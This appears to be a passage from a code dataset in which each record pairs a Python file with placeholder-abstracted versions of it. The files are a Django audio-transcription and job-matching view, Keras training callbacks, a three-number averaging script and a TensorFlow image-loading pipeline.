# obviously handle correct naming of the file and place it somewhere like media/uploads/
filename = str(Chat.objects.count())
filename = filename + "name" + ".wav"
uploadedFile = open(filename, "wb")
# the actual file is in request.body
uploadedFile.write(request.body)
uploadedFile.close()
# put additional logic like creating a model instance or something like this here
r = sr.Recognizer()
harvard = sr.AudioFile(filename)
with harvard as source:
audio = r.record(source)
msg = r.recognize_google(audio)
os.remove(filename)
chat_message = Chat(user=request.user, message=msg)
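    # Match the words of the transcribed message against each job's comma-separated skill list and record qualified users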
if msg != '':
j = Jobs.objects.all()
msg = msg.lower()
m = msg.split()
for jo in j:
skill = jo.skill.lower()
s = skill.split(',')
ms = set(m)
sk = set(s)
if ms & sk:
q = Qualified(user=request.user, message=jo.user)
q.save()
chat_message.save()
return redirect('/')
def messages(request):
user = request.user
chat = Qualified.objects.filter(user=user)
return render(request, 'messages.html', {'chat': chat, 'user': user})
| [
"import os\nfrom chat.models import Chat, Jobs, Qualified\nimport speech_recognition as sr\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {\n 'home': 'active',\n 'chat': chats,\n 'allusers': all_users\n }\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n\n # obviously handle correct naming of the file and place it somewhere like media/uploads/\n filename = str(Chat.objects.count())\n filename = filename + \"name\" + \".wav\"\n uploadedFile = open(filename, \"wb\")\n # the actual file is in request.body\n uploadedFile.write(request.body)\n uploadedFile.close()\n # put additional logic like creating a model instance or something like this here\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"import os\nfrom chat.models import Chat, Jobs, Qualified\nimport speech_recognition as sr\nfrom django.http import HttpResponse\nfrom django.http import JsonResponse\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"<import token>\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\ndef messages(request):\n user = request.user\n chat = Qualified.objects.filter(user=user)\n return render(request, 'messages.html', {'chat': chat, 'user': user})\n",
"<import token>\n\n\ndef home(request):\n chats = Chat.objects.all()\n all_users = User.objects.filter(messages__isnull=False).distinct()\n ctx = {'home': 'active', 'chat': chats, 'allusers': all_users}\n if request.user.is_authenticated:\n return render(request, 'chat.html', ctx)\n else:\n return render(request, 'base.html', None)\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\n<function token>\n",
"<import token>\n<function token>\n\n\ndef upload(request):\n customHeader = request.META['HTTP_MYCUSTOMHEADER']\n filename = str(Chat.objects.count())\n filename = filename + 'name' + '.wav'\n uploadedFile = open(filename, 'wb')\n uploadedFile.write(request.body)\n uploadedFile.close()\n r = sr.Recognizer()\n harvard = sr.AudioFile(filename)\n with harvard as source:\n audio = r.record(source)\n msg = r.recognize_google(audio)\n os.remove(filename)\n chat_message = Chat(user=request.user, message=msg)\n if msg != '':\n j = Jobs.objects.all()\n msg = msg.lower()\n m = msg.split()\n for jo in j:\n skill = jo.skill.lower()\n s = skill.split(',')\n ms = set(m)\n sk = set(s)\n if ms & sk:\n q = Qualified(user=request.user, message=jo.user)\n q.save()\n chat_message.save()\n return redirect('/')\n\n\n<function token>\n",
"<import token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,865 | 65cdb08b814cd913348a5e90b7ebfb34e712fe43 | # !/usr/bin/env python3.6
# -*- coding: utf-8 -*-
import os
from datetime import datetime
import tensorflow as tf
cwd = os.getcwd()
exps_dir = os.path.join(cwd, 'classification_experiments')
if not os.path.exists(exps_dir):
os.makedirs(exps_dir)
now = datetime.now().strftime('%b%d_%H-%M-%S')
model_name = 'CNN'
exp_dir = os.path.join(exps_dir, model_name + '_' + str(now))
if not os.path.exists(exp_dir):
os.makedirs(exp_dir)
callbacks = []
# Model checkpoint
# ----------------
ckpt_dir = os.path.join(exp_dir, 'ckpts')
if not os.path.exists(ckpt_dir):
os.makedirs(ckpt_dir)
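# Save only the weights at the end of every epoch; the epoch number is embedded in the checkpoint file name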
ckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(ckpt_dir, 'cp_{epoch:02d}.ckpt'),
save_weights_only=True) # False to save the model directly
callbacks.append(ckpt_callback)
# Visualize Learning on Tensorboard
# ---------------------------------
tb_dir = os.path.join(exp_dir, 'tb_logs')
if not os.path.exists(tb_dir):
os.makedirs(tb_dir)
# By default shows losses and metrics for both training and validation
tb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir,
profile_batch=0,
histogram_freq=1) # if 1 shows weights histograms
callbacks.append(tb_callback)
# Early Stopping
# --------------
early_stop = False
if early_stop:
    es_callback = tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)
    callbacks.append(es_callback)
# How to visualize Tensorboard
# 1. tensorboard --logdir EXPERIMENTS_DIR --port PORT <- from terminal
# 2. localhost:PORT <- in your browser | [
"# !/usr/bin/env python3.6\n# -*- coding: utf-8 -*-\n\nimport os\nfrom datetime import datetime\nimport tensorflow as tf\n\ncwd = os.getcwd()\n\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n\tos.makedirs(exps_dir)\n\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\n\nmodel_name = 'CNN'\n\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n\tos.makedirs(exp_dir)\n\ncallbacks = []\n\n# Model checkpoint\n# ----------------\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n\tos.makedirs(ckpt_dir)\n\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(ckpt_dir, 'cp_{epoch:02d}.ckpt'),\n\t\t\t\t\t\t\t\t\t\t\t\t save_weights_only=True) # False to save the model directly\ncallbacks.append(ckpt_callback)\n\n# Visualize Learning on Tensorboard\n# ---------------------------------\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n\tos.makedirs(tb_dir)\n\n# By default shows losses and metrics for both training and validation\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir,\n\t\t\t\t\t\t\t\t\t\t\t profile_batch=0,\n\t\t\t\t\t\t\t\t\t\t\t histogram_freq=1) # if 1 shows weights histograms\ncallbacks.append(tb_callback)\n\n# Early Stopping\n# --------------\nearly_stop = False\nif early_stop:\n\tes_callback = tf.keras.callback.EarlyStopping(monitor='val_loss', patience=10)\n\tcallbacks.append(es_callback)\n\n# How to visualize Tensorboard\n\n# 1. tensorboard --logdir EXPERIMENTS_DIR --port PORT <- from terminal\n# 2. localhost:PORT <- in your browser",
"import os\nfrom datetime import datetime\nimport tensorflow as tf\ncwd = os.getcwd()\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\nmodel_name = 'CNN'\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\ncallbacks = []\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(\n ckpt_dir, 'cp_{epoch:02d}.ckpt'), save_weights_only=True)\ncallbacks.append(ckpt_callback)\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir, profile_batch=\n 0, histogram_freq=1)\ncallbacks.append(tb_callback)\nearly_stop = False\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\ncwd = os.getcwd()\nexps_dir = os.path.join(cwd, 'classification_experiments')\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\nnow = datetime.now().strftime('%b%d_%H-%M-%S')\nmodel_name = 'CNN'\nexp_dir = os.path.join(exps_dir, model_name + '_' + str(now))\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\ncallbacks = []\nckpt_dir = os.path.join(exp_dir, 'ckpts')\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\nckpt_callback = tf.keras.callbacks.ModelCheckpoint(filepath=os.path.join(\n ckpt_dir, 'cp_{epoch:02d}.ckpt'), save_weights_only=True)\ncallbacks.append(ckpt_callback)\ntb_dir = os.path.join(exp_dir, 'tb_logs')\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\ntb_callback = tf.keras.callbacks.TensorBoard(log_dir=tb_dir, profile_batch=\n 0, histogram_freq=1)\ncallbacks.append(tb_callback)\nearly_stop = False\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\n<assignment token>\nif not os.path.exists(exps_dir):\n os.makedirs(exps_dir)\n<assignment token>\nif not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n<assignment token>\nif not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n<assignment token>\ncallbacks.append(ckpt_callback)\n<assignment token>\nif not os.path.exists(tb_dir):\n os.makedirs(tb_dir)\n<assignment token>\ncallbacks.append(tb_callback)\n<assignment token>\nif early_stop:\n es_callback = tf.keras.callback.EarlyStopping(monitor='val_loss',\n patience=10)\n callbacks.append(es_callback)\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n"
] | false |
99,866 | 5180d8deafcdf83c5c79636978bb0bfdfa2ba0dd | # Mini-challenge
# Design a program in which the user enters three numbers, one at a time, and the average of the three numbers is shown as output.
num1 = int(input("Ingrese el primer numero:"))
num2 = int(input("Ingrese el segundo numero:"))
num3 = int(input("Ingrese el tercer numero:"))
suma = num1 + num2 + num3
promedio = suma/3
print(promedio)
| [
"# Mini-desafio\n# Diseñar un programa en el cual el usuario ingrese tres números, uno a la vez, y se # muestre a la salida el promedio de los tres números.\n\nnum1 = int(input(\"Ingrese el primer numero:\"))\nnum2 = int(input(\"Ingrese el segundo numero:\"))\nnum3 = int(input(\"Ingrese el tercer numero:\"))\n\nsuma = num1 + num2 + num3\npromedio = suma/3\nprint(promedio)\n",
"num1 = int(input('Ingrese el primer numero:'))\nnum2 = int(input('Ingrese el segundo numero:'))\nnum3 = int(input('Ingrese el tercer numero:'))\nsuma = num1 + num2 + num3\npromedio = suma / 3\nprint(promedio)\n",
"<assignment token>\nprint(promedio)\n",
"<assignment token>\n<code token>\n"
] | false |
99,867 | 72183a250a1652510198f1c44b258d1b58ece15d | import tensorflow as tf
import functools
import os
import glob
import numpy as np
from PIL import Image
def from_0_1_to_m1_1(images):
"""
Center images from [0, 1) to [-1, 1).
Arguments:
images: tf.float32, in [0, 1), of any dimensions
Return:
images linearly scaled to [-1, 1)
"""
# shifting from [0, 1) to [-1, 1) is equivalent to assuming 0.5 mean
mean = 0.5
proimages = (images - mean) / mean
return proimages
def _parse_and_decode(filename, dataset_directory):
    """Parse one file-list entry and decode the image and its instance-id label.
    Args:
        filename: base file name (without extension) read from the file list.
        dataset_directory: dataset root containing 'images/' and 'panoptic_proc/'.
    Returns:
        im_dec: image tensor converted to float32 and scaled to [-1, 1).
        la_dec: decoded instance-id label image.
    """
filename_split = tf.unstack(tf.string_split([filename], "_").values[:-1], num=3)
strip_filename = tf.string_join(filename_split, "_")
im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)
la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.string)
im_ext = tf.cast('.png', tf.string)
la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)
im_filename = tf.string_join([im_dir, filename, im_ext])
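    # The label file name is the image base name (last '_'-separated token stripped) plus the instance-id suffix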
la_filename = tf.string_join([la_dir, strip_filename, la_ext])
im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))
# Check if the image is in greyscale and convert to RGB if so
greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)
im_dec = tf.cond(greyscale_cond,
lambda: tf.image.grayscale_to_rgb(im_dec),
lambda: tf.identity(im_dec))
im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)
im_dec = from_0_1_to_m1_1(im_dec)
la_dec = tf.image.decode_png(tf.read_file(la_filename))
return im_dec, la_dec
def _parse_and_decode_inference(filename, dataset_directory):
im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)
im_ext = tf.cast('.png', tf.string)
im_filename = tf.string_join([im_dir, filename, im_ext])
im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))
im_dec_raw = im_dec
# Check if the image is in greyscale and convert to RGB if so
greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)
im_dec = tf.cond(greyscale_cond,
lambda: tf.image.grayscale_to_rgb(im_dec),
lambda: tf.identity(im_dec))
im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)
im_dec = from_0_1_to_m1_1(im_dec)
return im_dec, im_filename, im_dec_raw
def _preprocess_images(image, label, params):
if params.random_flip:
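        # Stack image and label along the channel axis so the same random flip is applied to both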
label = tf.cast(tf.expand_dims(label, -1), tf.float32)
im_la = tf.concat([image, label], axis=-1)
im_la = tf.image.random_flip_left_right(im_la)
image = im_la[..., 0:3]
label = im_la[..., 3]
label = tf.cast(label, tf.uint8)
label = tf.squeeze(label)
image.set_shape([params.height_input, params.width_input, 3])
label.set_shape([params.height_input, params.width_input])
return image, label
def _resize_images(image, label, height, width):
    """Resize an image/label pair to a fixed spatial size.
    Args:
        image: image tensor, resized with bilinear interpolation.
        label: label tensor, resized with nearest-neighbour interpolation.
        height: target height in pixels.
        width: target width in pixels.
    Returns:
        The resized image and label with their static shapes set.
    """
im_res = tf.image.resize_images(image, [height, width])
la_res = tf.image.resize_images(label, [height, width],
method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)
la_res = tf.squeeze(la_res, axis=2)
im_res.set_shape([height, width, 3])
la_res.set_shape([height, width])
return im_res, la_res
def _resize_images_inference(image, im_filename, im_raw, height, width):
    """Resize an image for inference, passing the file name and raw image through unchanged.
    Args:
        image: image tensor, resized with bilinear interpolation.
        im_filename: full path of the image file.
        im_raw: original (unscaled) decoded image, passed through unchanged.
        height: target height in pixels.
        width: target width in pixels.
    Returns:
        The resized image together with im_filename and im_raw.
    """
im_res = tf.image.resize_images(image, [height, width])
im_res.set_shape([height, width, 3])
return im_res, im_filename, im_raw
def train_input(params):
    """Build the training input pipeline: decode, resize, optionally flip, batch, shuffle and repeat.
    Args:
        params: configuration object providing dataset_directory, filelist_filepath,
            height_input, width_input, Nb and random_flip.
    Returns:
        A tf.data.Dataset yielding batches of (image, label) pairs.
    """
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images, height=params.height_input, width=params.width_input))
dataset = dataset.map(
functools.partial(_preprocess_images, params=params))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(params.Nb)
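    # Note: shuffling happens after batching here, so whole batches (buffer of 100) are shuffled; repeat(None) loops indefinitely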
dataset = dataset.shuffle(100)
dataset = dataset.repeat(None)
return dataset
def evaluate_input(params):
    """Build the evaluation input pipeline: decode and resize, one example per batch.
    Args:
        params: configuration object providing dataset_directory, filelist_filepath,
            height_input and width_input.
    Returns:
        A tf.data.Dataset yielding (image, label) pairs with batch size 1.
    """
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images, height=params.height_input, width=params.width_input))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(1)
return dataset
def inference_input(params):
    """Build the inference input pipeline: decode the image only, resize, batch size 1.
    Args:
        params: configuration object providing dataset_directory, filelist_filepath,
            height_input and width_input.
    Returns:
        A tf.data.Dataset yielding (image, filename, raw image) tuples with batch size 1.
    """
dataset_directory = params.dataset_directory
filelist_filepath = params.filelist_filepath
filenames_string = tf.cast(filelist_filepath, tf.string)
dataset = tf.data.TextLineDataset(filenames=filenames_string)
dataset = dataset.map(
functools.partial(_parse_and_decode_inference, dataset_directory=dataset_directory),
num_parallel_calls=30)
dataset = dataset.map(
functools.partial(_resize_images_inference, height=params.height_input, width=params.width_input))
# IMPORTANT: if Nb > 1, then shape of dataset elements must be the same
dataset = dataset.batch(1)
return dataset | [
"import tensorflow as tf\nimport functools\nimport os\nimport glob\nimport numpy as np\nfrom PIL import Image\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n\n # shifting from [0, 1) to [-1, 1) is equivalent to assuming 0.5 mean\n mean = 0.5\n proimages = (images - mean) / mean\n\n return proimages\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], \"_\").values[:-1], num=3)\n strip_filename = tf.string_join(filename_split, \"_\")\n\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n\n # Check if the image is in greyscale and convert to RGB if so\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond,\n lambda: tf.image.grayscale_to_rgb(im_dec),\n lambda: tf.identity(im_dec))\n\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n\n return im_dec, la_dec\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n\n # Check if the image is in greyscale and convert to RGB if so\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond,\n lambda: tf.image.grayscale_to_rgb(im_dec),\n lambda: tf.identity(im_dec))\n\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n\n return im_dec, im_filename, im_dec_raw\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n\n return image, label\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width],\n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n\n return im_res, la_res\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n\n return im_res, im_filename, im_raw\n\ndef train_input(params):\n \"\"\"\n\n 
Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images, height=params.height_input, width=params.width_input))\n\n dataset = dataset.map(\n functools.partial(_preprocess_images, params=params))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(params.Nb)\n dataset = dataset.shuffle(100)\n dataset = dataset.repeat(None)\n\n return dataset\n\ndef evaluate_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images, height=params.height_input, width=params.width_input))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(1)\n\n return dataset\n\ndef inference_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n\n dataset = tf.data.TextLineDataset(filenames=filenames_string)\n\n dataset = dataset.map(\n functools.partial(_parse_and_decode_inference, dataset_directory=dataset_directory),\n num_parallel_calls=30)\n\n dataset = dataset.map(\n functools.partial(_resize_images_inference, height=params.height_input, width=params.width_input))\n\n # IMPORTANT: if Nb > 1, then shape of dataset elements must be the same\n dataset = dataset.batch(1)\n\n return dataset",
"import tensorflow as tf\nimport functools\nimport os\nimport glob\nimport numpy as np\nfrom PIL import Image\n\n\ndef from_0_1_to_m1_1(images):\n \"\"\"\n Center images from [0, 1) to [-1, 1).\n\n Arguments:\n images: tf.float32, in [0, 1), of any dimensions\n\n Return:\n images linearly scaled to [-1, 1)\n \"\"\"\n mean = 0.5\n proimages = (images - mean) / mean\n return proimages\n\n\ndef _parse_and_decode(filename, dataset_directory):\n \"\"\"\n\n Args:\n filename:\n dataset_directory:\n\n Returns:\n\n \"\"\"\n filename_split = tf.unstack(tf.string_split([filename], '_').values[:-1\n ], num=3)\n strip_filename = tf.string_join(filename_split, '_')\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n la_dir = tf.cast(os.path.join(dataset_directory, 'panoptic_proc/'), tf.\n string)\n im_ext = tf.cast('.png', tf.string)\n la_ext = tf.cast('_gtFine_instanceIds.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n la_filename = tf.string_join([la_dir, strip_filename, la_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n la_dec = tf.image.decode_png(tf.read_file(la_filename))\n return im_dec, la_dec\n\n\ndef _parse_and_decode_inference(filename, dataset_directory):\n im_dir = tf.cast(os.path.join(dataset_directory, 'images/'), tf.string)\n im_ext = tf.cast('.png', tf.string)\n im_filename = tf.string_join([im_dir, filename, im_ext])\n im_dec = tf.image.decode_jpeg(tf.read_file(im_filename))\n im_dec_raw = im_dec\n greyscale_cond = tf.equal(tf.shape(im_dec)[-1], 1)\n im_dec = tf.cond(greyscale_cond, lambda : tf.image.grayscale_to_rgb(\n im_dec), lambda : tf.identity(im_dec))\n im_dec = tf.image.convert_image_dtype(im_dec, dtype=tf.float32)\n im_dec = from_0_1_to_m1_1(im_dec)\n return im_dec, im_filename, im_dec_raw\n\n\ndef _preprocess_images(image, label, params):\n if params.random_flip:\n label = tf.cast(tf.expand_dims(label, -1), tf.float32)\n im_la = tf.concat([image, label], axis=-1)\n im_la = tf.image.random_flip_left_right(im_la)\n image = im_la[..., 0:3]\n label = im_la[..., 3]\n label = tf.cast(label, tf.uint8)\n label = tf.squeeze(label)\n image.set_shape([params.height_input, params.width_input, 3])\n label.set_shape([params.height_input, params.width_input])\n return image, label\n\n\ndef _resize_images(image, label, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n la_res = tf.image.resize_images(label, [height, width], method=tf.image\n .ResizeMethod.NEAREST_NEIGHBOR)\n la_res = tf.squeeze(la_res, axis=2)\n im_res.set_shape([height, width, 3])\n la_res.set_shape([height, width])\n return im_res, la_res\n\n\ndef _resize_images_inference(image, im_filename, im_raw, height, width):\n \"\"\"\n\n Args:\n image:\n label:\n height:\n width:\n\n Returns:\n\n \"\"\"\n im_res = tf.image.resize_images(image, [height, width])\n im_res.set_shape([height, width, 3])\n return im_res, im_filename, im_raw\n\n\ndef train_input(params):\n \"\"\"\n\n Args:\n params:\n\n Returns:\n\n \"\"\"\n dataset_directory = params.dataset_directory\n filelist_filepath = params.filelist_filepath\n filenames_string = tf.cast(filelist_filepath, tf.string)\n dataset = 
